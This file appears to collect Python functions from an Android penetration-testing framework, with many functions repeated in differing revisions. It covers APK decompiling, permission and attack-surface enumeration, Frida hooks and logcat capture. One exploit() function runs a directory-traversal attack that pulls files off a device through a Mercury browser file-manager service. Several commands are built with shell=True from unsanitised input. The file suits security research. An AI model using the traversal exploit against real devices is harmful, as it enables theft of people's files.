def run_d2j(self): """ Run d2j-dex2jar.sh on a target APK and drop JAR into the output directory """ print( t.green("[{0}] ".format(datetime.now())) + t.yellow("Running dex2jar : ") + self.apk) try: Popen([ "{0} output/d2j/{1}.jar {2}".format( D2JEnum.commands.get("decompile"), self.directory, self.apk) ], shell=True).wait() print( t.green("[{0}] ".format(datetime.now())) + t.yellow("Finished!")) except CalledProcessError as e: print(t.red("[{0}] ".format(datetime.now)) + e.returncode) Logger.run_logger(e.message)
def do_scalpel(args): """ Description: Requirements: Usage: """ if args: if args == enum.SCALPEL_ARGS_START_SERVER: print( t.green( "[{0}] ".format(datetime.now()) + t.red(enum.SCAlPEL_BANNER) + t.yellow(enum.SCAlPEL_SERVER) ) ) try: from framework.brains.scalpel.server.scalpel_server import ScalpelServer global scalpel # Instantiate the ScalpelServer # scalpel = ScalpelServer() scalpel.run() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SCALPEL)) Logger.run_logger(e.message) else: print(t.red("[{0}] ".format(datetime.now()) + enum.ARGUMENTS))
def run_parse_uri(self): """ Use adb to load up the Main Activity and point it back out our blocking web server in order to trigger the parsing of the intent:// URL scheme """ # Target package and activity # activity = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter the target Activity: "))) target = "{0}/{1}".format(self.apk.get_package(), activity) print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Target URI : ") + "{0}".format(target)) try: with open("{0}/framework/config".format(os.getcwd()), "r") as config: ip = config.readline().strip("\n") config.close() url = "http://{0}:5000/services/intent".format(ip) Popen(["{0} -n {1} -d {2}".format(ADBEnum.commands.get("am start"), target, url)], shell=True).wait() print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Command successful : Check you device!")) except IOError as e: print(t.red("[{0}]".format(datetime.now()) + "Unable to read config")) Logger.run_logger(e.message)
def do_components(args): """ Description: Enumerate components for target APK Requirements: Loaded APK Usage: components """ try: from framework.brains.apk.enumeration.components import Components if globals()["apk"] is not None: # Instantiate components # module # c = Components(globals()["apk"]) c.enum_component() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.COMPONENTS_MODULE_MESSAGE)) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_COMPONENTS)) Logger.run_logger(e.message)
def do_debuggable(args): """ Description: Make target APK debuggable Requirements: Target APK Usage: debuggable <name_of_output_directory> && </path/to/apk> """ try: from framework.brains.apk.debuggable import Debuggable # Instantiate debuggable # module # d = Debuggable(args.split()[0], args.split()[1]) d.run_debuggable() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_DEBUGGABLE)) Logger.run_logger(e.message) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.DEBUGGABLE_USAGE)))
def do_d2j(args): """ Description: Runs d2j-dex2jar.sh on the target APK Requirements: Target APK Usage: d2j <directory_name> </path/to/apk> """ try: from framework.brains.dex2jar.d2j import D2J # Instantiate d2j # module # d = D2J(args.split()[0], args.split()[1]) d.run_d2j() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_D2J)) Logger.run_logger(e.message) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.D2J_USAGE)))
def do_surgical(args): """ Description: Instantiates the SurgicalAPI with available functions and operations Requirements: Loaded APK Usage: surgical """ try: from framework.brains.surgical.api import SurgicalAPI if globals()["apks"] is not None: # Instantiate surgicalAPI # s = SurgicalAPI(globals()["apks"], "apks") s.run_surgical() elif globals()["dex"] is not None: s = SurgicalAPI(globals()["dex"], "dex") s.run_surgical() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.SURGICAL_MODULE_MESSAGE)) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SURGICAL)) Logger.run_logger(e.message)
def do_frida(args): """ Description: Runs the Frida instrumentation toolkit against a target process Requirements: Loaded APK Usage: frida """ try: from framework.brains.dynamic.frida.instrumentation import Frida if globals()["apk"] is not None: # Instantiate frida # module # i = Frida(globals()["apk"]) i.run_frida() else: print( t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.FRIDA_MODULE_MESSAGE)) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_FRIDA)) Logger.run_logger(e.message)
def do_bowser(args): """ Description: Runs the bowser toolkit on a target APK Requirements: Loaded APK, Lobotomy web services Usage: bowser <enum> || <parseUri> """ try: from framework.brains.bowser.bowser import Bowser if globals()["apk"] is not None and globals()["apks"] is not None: b = Bowser(globals()["apks"], globals()["apk"]) if args.split()[0] == "enum": b.run_bowser() if args.split()[0] == "parseUri": b.run_parse_uri() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot run the bowser module without a target executable")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Bowser")) Logger.run_logger(e.message)
def do_surgical(args): """ Description: Instantiates the SurgicalAPI with available functions and operations Requirements: Loaded APK Usage: surgical """ try: from framework.brains.surgical.api import SurgicalAPI if globals()["apks"] is not None: # Instantiate surgicalAPI # s = SurgicalAPI(globals()["apks"], "apks") s.run_surgical() elif globals()["dex"] is not None: s = SurgicalAPI(globals()["dex"], "dex") s.run_surgical() else: print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.SURGICAL_MODULE_MESSAGE)) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SURGICAL)) Logger.run_logger(e.message)
def do_attacksurface(args): """ Description: Enumerates attacksurface for target APK Requirements: Loaded APK Usage: attacksurface """ try: from framework.brains.apk.enumeration.attack_surface import AttackSurface if globals()["apk"] is not None: # Instantiate attacksurface # module # c = AttackSurface(globals()["apk"]) c.run_enum_attack_surface() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.ATTACKSURFACE_MODULE_MESSAGE)) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_ATTACKSURFACE)) Logger.run_logger(e.message)
def do_exploit(args): """ Description: Instantiates the ExploitAPI with available exploits Requirements: Loaded APK Usage: [exploit] & [type] & [name] [module] - Example: exploit browser mercury wfm """ try: from framework.brains.exploits.api import ExploitAPI if args.split()[0] and args.split()[1] and args.split()[2]: # The Exploit API is always # expecting these **kwargs ExploitAPI(exploit=args.split()[0], name=args.split()[1], module=args.split()[2]) else: print( t.red("[{0}] ".format(datetime.now()) + "Not enough arguments!")) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import the ExploitAPI")) Logger.run_logger(e.message)
def do_permissions(args): """ Description: List enumeration and api mappings from target APK Requirements: Loaded APK Usage: permissions <list> || <map> """ try: from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap if args == "list": if globals()["apk"] is not None: p = PermissionsList(globals()["apk"]) p.run_list_permissions() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot list permissions with out a loaded APK")) if args == "map": if globals()["apk"] is not None and globals()["apks"] is not None: p = PermissionsMap(globals()["apk"], globals()["apks"]) p.run_map_permissions() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot map permissions with out an executable or APK")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Permissions")) Logger.run_logger(e.message)
def do_decompile(args): """ Description: Decompile target APK with apktool.jar Requirements: Target APK Usage: decompile <name_of_output_directory> && </path/to/apk> """ try: from framework.brains.apk.decompile import Decompile if args[0] and args[1]: decompile = Decompile(args.split()[0], args.split()[1]) decompile.run_decompile() else: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.DECOMPILE_USAGE))) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.IMPORT_ERROR_DECOMPILE))) Logger.run_logger(e.message)
def do_surgical(args): """ Description: Instantiates the SurgicalAPI with available functions and operations Requirements: Loaded APK Usage: surgical """ try: from framework.brains.surgical.api import SurgicalAPI if globals()["apks"] is not None: s = SurgicalAPI(globals()["apks"], "apks") s.run_surgical() elif globals()["dex"] is not None: s = SurgicalAPI(globals()["dex"], "dex") s.run_surgical() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot run the surgical module without a target executable")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the SurgicalAPI")) Logger.run_logger(e.message)
def do_loader(args): """ Description: Load target APK for analysis wth androguard -- Requirements: Target APK Usage: loader </path/to/apk> Usage: loader apk </path/to/apk> """ try: from framework.brains.apk.loader import Loader # Pass arguments to # the loader module # loader = Loader(args) global apk, apks, dex if args.split()[0] == "apk": apk = loader.run_loader() apks = None elif args.split()[0] == "dex": dex = loader.run_loader() apk = None apks = None else: apk, apks = loader.run_loader() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Loader")) Logger.run_logger(e.message)
def do_scalpel(args): """ Description: Requirements: Usage: """ if args: if args == enum.SCALPEL_ARGS_START_SERVER: print( t.green("[{0}] ".format(datetime.now()) + t.red(enum.SCAlPEL_BANNER) + t.yellow(enum.SCAlPEL_SERVER))) try: from framework.brains.scalpel.server.scalpel_server import ScalpelServer global scalpel # Instantiate the ScalpelServer # scalpel = ScalpelServer() scalpel.run() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_SCALPEL)) Logger.run_logger(e.message) else: print(t.red("[{0}] ".format(datetime.now()) + enum.ARGUMENTS))
def do_profiler(args): """ Description: Run profiling on the target APK loaded Requirements: Loaded APK Usage: profiler """ try: from framework.brains.apk.enumeration.profiler import Profiler if globals()["apk"] is not None: p = Profiler(globals()["apk"]) p.run_profiler() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.PROFILER_MODULE_MESSAGE)) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_LOADER)) Logger.run_logger(e.message)
def do_permissions(args): """ Description: List enumeration and api mappings from target APK Requirements: Loaded APK Usage: permissions <list> || <map> """ try: from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap if args: if args == "list": if globals()["apk"] is not None: # Instantiate permissions # module # p = PermissionsList(globals()["apk"]) p.run_list_permissions() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_LIST_MODULE_MESSAGE)) if args == "map": if globals()["apk"] is not None and globals( )["apks"] is not None: # Instantiate permissions # module p = PermissionsMap(globals()["apk"], globals()["apks"]) p.run_map_permissions() else: print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print( t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_MAP_MODULE_MESSAGE)) else: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.DECOMPILE_USAGE))) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_PERMISSIONS)) Logger.run_logger(e.message)
def exploit(self): """ Handle exploit operations """ ip = None while True: with open("".join([os.getcwd(), "/framework/config"]), "r") as f: web_service = "http://{0}:5000/exploits/mercury/wfm/check".format(f.readline().strip("\n")) f.close() print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Polling ..."))) try: r = requests.get(web_service) if r.text == "Not Engaged": time.sleep(2) continue else: # Response should contain # device IP address # ip = r.text print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Exploit ready! Target IP : ") + ip) break except requests.HTTPError as e: raise e except requests.ConnectionError as e: raise e # Setup requests # parameters # url = "".join(["http://{0}:8888/dodownload?fname=".format(ip), MercuryEnum().dir_trav_path]) headers = {"Referer": "http://{0}:8888/".format(ip)} try: for f in MercuryEnum.files: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Retrieving ") + "{0}".format(f))) local = "".join([os.getcwd(), MercuryEnum.download_dir, f.split("/")[-1]]) r = requests.get("".join([url, f]), headers=headers, stream=True) if r.status_code == 200: with open(local, "wb") as l: for data in r.iter_content(chunk_size=1024): l.write(data) l.flush() except requests.HTTPError as e: print(t.red("[{0}] ".format(datetime.now()) + "Http error, check logs!")) Logger.run_logger(e.message) except requests.ConnectionError as e: print(t.red("[{0}] ".format(datetime.now()) + "Connection error, check logs!")) # Unicode error # Logger.run_logger(e.message[0])
def run_decompile(self): """ Decompile target APK with apktool.jar """ print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Decompiling : ") + self.apk) try: Popen("java -jar {0} d {1} -f -o output/{2}".format("".join([os.getcwd(), "/bin/apktool.jar"]), self.apk, self.directory), shell=True).wait() print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Finished!")) except CalledProcessError as e: print(t.red("[{0}] ".format(datetime.now)) + e.returncode) Logger.run_logger(e.message)
def do_decompile(args): """ Description: Decompile target APK with apktool.jar Requirements: Target APK Usage: decompile <name_of_output_directory> && </path/to/apk> """ try: from framework.brains.apk.decompile import Decompile decompile = Decompile(args.split()[0], args.split()[1]) decompile.run_decompile() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Decompile")) Logger.run_logger(e.message)
def do_surgical(args): """ Description: Instantiates the SurgicalAPI with available functions and operations Requirements: Loaded APK Usage: surgical """ try: from framework.brains.surgical.api import SurgicalAPI s = SurgicalAPI(globals()["apks"]) s.run_surgical() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the SurgicalAPI")) Logger.run_logger(e.message)
def do_attacksurface(args): """ Description: Enumerates attacksurface for target APK Requirements: Loaded APK Usage: attacksurface """ try: from framework.brains.apk.enumeration.attack_surface import AttackSurface c = AttackSurface(globals()["apk"]) c.run_enum_attack_surface() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import AttackSurface")) Logger.run_logger(e.message)
def do_profiler(args): """ Description: Run profiling on the target APK loaded Requirements: Loaded APK Usage: profiler """ try: from framework.brains.apk.enumeration.profiler import Profiler p = Profiler(globals()["apk"]) p.run_profiler() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Profiler")) Logger.run_logger(e.message)
def do_components(args): """ Description: Enumerate components for target APK Requirements: Loaded APK Usage: permissions """ try: from framework.brains.apk.enumeration.components import Components c = Components(globals()["apk"]) c.enum_component() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Components")) Logger.run_logger(e.message)
def do_frida(args): """ Description: Runs the Frida instrumentation toolkit against a target process Requirements: Loaded APK Usage: frida """ try: from framework.brains.dynamic.frida.instrumentation import Instrumentation i = Instrumentation(globals()["apk"]) i.run_instrumentation() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Instrumentation")) Logger.run_logger(e.message)
def do_d2j(args): """ Description: Runs d2j-dex2jar.sh on the target APK Requirements: Target APK Usage: d2j <directory_name> </path/to/apk> """ try: from framework.brains.dex2jar.d2j import D2J d = D2J(args.split()[0], args.split()[1]) d.run_d2j() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import D2J")) Logger.run_logger(e.message)
def run_profiler(self): """ Profiles the target APK """ print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Running profiler against: ") + self.apk.filename) # Going to wrap this in a try block # just in case anything fails # try: package, sdk, backups, files = self.apk.get_package(), \ self.apk.get_target_sdk_version(), \ self.apk.get_element("application", "allowBackup"), \ self.apk.get_files() if package: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Package name : ") + package)) if sdk: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Target SDK version : ") + sdk)) if backups: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Backups allowed : ") + backups)) if files: for f in files: print(t.green("[{0}] ".format(datetime.now()) + t.yellow("File : ") + f)) except Exception as e: # Staying generic for # the moment # print(t.green("[{0}] ".format(datetime.now()) + t.red(e.message))) Logger.run_logger(e.message)
def do_profiler(args): """ Description: Run profiling on the target APK loaded Requirements: Loaded APK Usage: profiler """ try: from framework.brains.apk.enumeration.profiler import Profiler p = Profiler(globals()["apk"]) p.run_profiler() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import Profiler")) Logger.run_logger(e.message)
def do_loader(args): """ Description: Load target APK for analysis wth androguard -- Requirements: Target APK Usage: loader </path/to/apk> """ try: from framework.brains.apk.loader import Loader loader = Loader(args) global apk, apks apk, apks = loader.run_loader() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Loader")) Logger.run_logger(e.message)
def do_logcat(args): """ Description: Runs logcat against the target APK and sends the output to its RESTFul service handler Requirements: Loaded APK Usage: logcat """ try: from framework.brains.dynamic.logcat import Logcat l = Logcat() l.run_logcat() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Logcat")) Logger.run_logger(e.message)
def do_surgical(args): """ Description: Instantiates the SurgicalAPI with available functions and operations Requirements: Loaded APK Usage: surgical """ try: from framework.brains.surgical.api import SurgicalAPI s = SurgicalAPI(globals()["apks"]) s.run_surgical() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import the SurgicalAPI")) Logger.run_logger(e.message)
def do_components(args): """ Description: Enumerate components for target APK Requirements: Loaded APK Usage: permissions """ try: from framework.brains.apk.enumeration.components import Components c = Components(globals()["apk"]) c.enum_component() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import Components")) Logger.run_logger(e.message)
def do_frida(args): """ Description: Runs the Frida instrumentation toolkit against a target process Requirements: Loaded APK Usage: frida """ try: from framework.brains.dynamic.frida.instrumentation import Instrumentation i = Instrumentation(globals()["apk"]) i.run_instrumentation() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import Instrumentation")) Logger.run_logger(e.message)
def do_attacksurface(args): """ Description: Enumerates attacksurface for target APK Requirements: Loaded APK Usage: attacksurface """ try: from framework.brains.apk.enumeration.attack_surface import AttackSurface c = AttackSurface(globals()["apk"]) c.run_enum_attack_surface() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import AttackSurface")) Logger.run_logger(e.message)
def do_loader(args): """ Description: Load target APK for analysis wth androguard -- Requirements: Target APK Usage: loader </path/to/apk> """ try: from framework.brains.apk.loader import Loader loader = Loader(args) global apk, apks apk, apks = loader.run_loader() except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + "Unable to import Loader")) Logger.run_logger(e.message)
def http_handler(output): """ Handler for submitting logs to the logcat web service """ try: with open("{0}/framework/config".format(os.getcwd()), "r") as config: ip = config.readline() config.close() # Populate POST request # with output from # Logcat # data = {"data": output} # TODO - 07/26/2015 # Remove hardcoded string and add to enums # r = requests.post("http://{0}:5000/services/logcat/update".format( ip.strip("\n")), data=data) if r.text == "Success": print( t.green("[{0}] ".format(datetime.now()) + t.yellow("Success!"))) else: print( t.green("[{0}] ".format(datetime.now()) + t.red("Error! ") + "Check flask.log")) except IOError as e: print(t.red("[{0}] ".format(datetime.now()) + e)) Logger.run_logger(e) except requests.ConnectionError as e: print(t.red("[{0}] ".format(datetime.now()) + e.response)) Logger.run_logger(e.response) return
def do_exploit(args): """ Description: Instantiates the ExploitAPI with available exploits Requirements: Loaded APK Usage: [exploit] & [type] & [name] [module] - Example: exploit browser mercury wfm """ try: from framework.brains.exploits.api import ExploitAPI if args.split()[0] and args.split()[1] and args.split()[2]: ExploitAPI(exploit=args.split()[0], name=args.split()[1], module=args.split()[2]) else: print(t.red("[{0}] ".format(datetime.now()) + "Not enough arguments!")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import the ExploitAPI")) Logger.run_logger(e.message)
def do_loader(args): """ Description: Load target APK or classes.dex for analysis Requirements: APK or Dalvik Executable Usage: loader </path/to/apk> - Load APK which includes classes.dex Usage: loader apk </path/to/apk> - Load APK which does not include classes.dex Usage: loader dex </path/to/classes.dex> - Load classes.dex """ try: from framework.brains.apk.loader import Loader # Pass arguments to the loader module loader = Loader(args) # Define global variables global apk, apks, dex # Begin to check command line arguments for the loader module if args: # APK only if args.split()[0] == enum.APK: apk, apks = loader.run_loader(), None # DEX only elif args.split()[0] == enum.DEX: dex, apk, apks = loader.run_loader(), None, None else: apk, apks = loader.run_loader() else: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print( t.red("[{0}] ".format(datetime.now()) + t.white(enum.LOADER_USAGE))) except ImportError as e: print( t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_LOADER)) Logger.run_logger(e.message)
def http_handler(output): """ Handler for submitting logs to the logcat web service """ try: with open("{0}/framework/config".format(os.getcwd()), "r") as config: ip = config.readline() config.close() # Populate POST request # with output from # Logcat # data = {"data": output} # TODO - 07/26/2015 # Remove hardcoded string and add to enums # r = requests.post("http://{0}:5000/services/logcat/update".format(ip.strip("\n")), data=data) if r.text == "Success": print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Success!"))) else: print(t.green("[{0}] ".format(datetime.now()) + t.red("Error! ") + "Check flask.log")) except IOError as e: print(t.red("[{0}] ".format(datetime.now()) + e)) Logger.run_logger(e) except requests.ConnectionError as e: print(t.red("[{0}] ".format(datetime.now()) + e.response)) Logger.run_logger(e.response) return
def do_profiler(args): """ Description: Run profiling on the target APK loaded Requirements: Loaded APK Usage: profiler """ try: from framework.brains.apk.enumeration.profiler import Profiler if globals()["apk"] is not None: p = Profiler(globals()["apk"]) p.run_profiler() else: print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PROFILER_MODULE_MESSAGE)) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_LOADER)) Logger.run_logger(e.message)
def do_bowser(args): """ Description: Runs the bowser toolkit on a target APK Requirements: Loaded APK, Lobotomy web services Usage: bowser <enum> || <parseUri> """ try: from framework.brains.bowser.bowser import Bowser b = Bowser(globals()["apks"], globals()["apk"]) if args.split()[0] == "enum": b.run_bowser() if args.split()[0] == "parseUri": b.run_parse_uri() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Bowser")) Logger.run_logger(e.message)
def do_permissions(args): """ Description: List enumeration and api mappings from target APK Requirements: Loaded APK Usage: permissions <list> || <map> """ try: from framework.brains.apk.enumeration.permissions import Permissions p = Permissions(globals()["apk"], globals()["apks"]) if args == "list": p.run_list_permissions() if args == "map": p.run_map_permissions() except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Permissions")) Logger.run_logger(e.message)
def do_permissions(args): """ Description: List enumeration and api mappings from target APK Requirements: Loaded APK Usage: permissions <list> || <map> """ try: from framework.brains.apk.enumeration.permissions import PermissionsList, PermissionsMap if args: if args == "list": if globals()["apk"] is not None: # Instantiate permissions # module # p = PermissionsList(globals()["apk"]) p.run_list_permissions() else: print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_LIST_MODULE_MESSAGE)) if args == "map": if globals()["apk"] is not None and globals()["apks"] is not None: # Instantiate permissions # module p = PermissionsMap(globals()["apk"], globals()["apks"]) p.run_map_permissions() else: print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.MODULE_UNAVAILABLE)) print(t.red("[{0}] ".format(datetime.now())) + t.white(enum.PERMISSIONS_MAP_MODULE_MESSAGE)) else: print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) except Exception as e: if e.message == enum.STRING_INDEX_ERROR or e.message == enum.LIST_INDEX_ERROR: print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.ARGUMENTS))) print(t.red("[{0}] ".format(datetime.now()) + t.white(enum.DECOMPILE_USAGE))) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + enum.IMPORT_ERROR_PERMISSIONS)) Logger.run_logger(e.message)
def run_logcat(self): """ Run Logcat with a keyword search that dumps output """ while True: result = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Would you like to run Logcat? { Y || N } : "))) if result == "N": break elif result == "Y": keyword = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter keyword search : "))) try: p = Popen("adb logcat -d | grep {0}".format(keyword), stdout=PIPE, stderr=PIPE, shell=True) # Create a new Timer() # object and handle process timeouts # with a callback # thread = Timer(3.0, self.timeout, [p]) thread.start() thread.join() except CalledProcessError as e: print(t.red("[{0}] ".format(datetime.now()) + e.returncode)) Logger.run_logger(e.message) except IOError as e: print(t.red("[{0}] ".format(datetime.now()) + e.message)) Logger.run_logger(e.message)
def run_d2j(self): """ Run d2j-dex2jar.sh on a target APK and drop JAR into the output directory """ print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Running dex2jar : ") + self.apk) try: Popen(["{0} output/d2j/{1}.jar {2}".format(D2JEnum.commands.get("decompile"), self.directory, self.apk)], shell=True).wait() print(t.green("[{0}] ".format(datetime.now())) + t.yellow("Finished!")) except CalledProcessError as e: print(t.red("[{0}] ".format(datetime.now)) + e.returncode) Logger.run_logger(e.message)
def run_instrumentation(self): """ Select and run instrumentation function using the Frida instrumentation toolkit """ while True: print(t.green("[{0}] ".format(datetime.now()) + t.cyan("Enter 'quit' to exit Frida module!"))) print(t.green("[{0}] ".format(datetime.now()) + t.yellow("Available Frida functions: ") + "activities, webview")) function = raw_input(t.green("[{0}] ".format(datetime.now()) + t.yellow("Enter Frida function: "))) if function == "quit": break try: if function == "activities": # adb forward just # in case # Popen("adb forward tcp:27042 tcp:27042", shell=True).wait() process = frida.get_device_manager().enumerate_devices()[-1].attach(self.apk.get_package()) script = process.create_script(self.do_activities()) script.on('message', self.on_message) script.load() sys.stdin.read() elif function == "webview": # adb forward just # in case # Popen("adb forward tcp:27042 tcp:27042", shell=True).wait() process = frida.get_device_manager().enumerate_devices()[-1].attach(self.apk.get_package()) script = process.create_script(self.do_webview()) script.on('message', self.on_message) script.load() sys.stdin.read() except frida.ProcessNotFoundError as e: print(t.red("[{0}] ".format(datetime.now()) + "Could not connect to target process!")) Logger.run_logger(e.message) except frida.ServerNotRunningError as e: print(t.red("[{0}] ".format(datetime.now()) + "The frida-server is not running!")) Logger.run_logger(e.message) except frida.TransportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Connection was closed!")) Logger.run_logger(e.message) except KeyboardInterrupt: pass
def do_frida(args): """ Description: Runs the Frida instrumentation toolkit against a target process Requirements: Loaded APK Usage: frida """ try: from framework.brains.dynamic.frida.instrumentation import Instrumentation if globals()["apk"] is not None: i = Instrumentation(globals()["apk"]) i.run_instrumentation() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot run the frida module without a loaded APK")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Instrumentation")) Logger.run_logger(e.message)
def do_profiler(args): """ Description: Run profiling on the target APK loaded Requirements: Loaded APK Usage: profiler """ try: from framework.brains.apk.enumeration.profiler import Profiler if globals()["apk"] is not None: p = Profiler(globals()["apk"]) p.run_profiler() else: print(t.red("[{0}] ".format(datetime.now())) + t.white("Module not available")) print(t.red("[{0}] ".format(datetime.now())) + t.white("You cannot run the profiler module without a loaded APK")) except ImportError as e: print(t.red("[{0}] ".format(datetime.now()) + "Unable to import Profiler")) Logger.run_logger(e.message)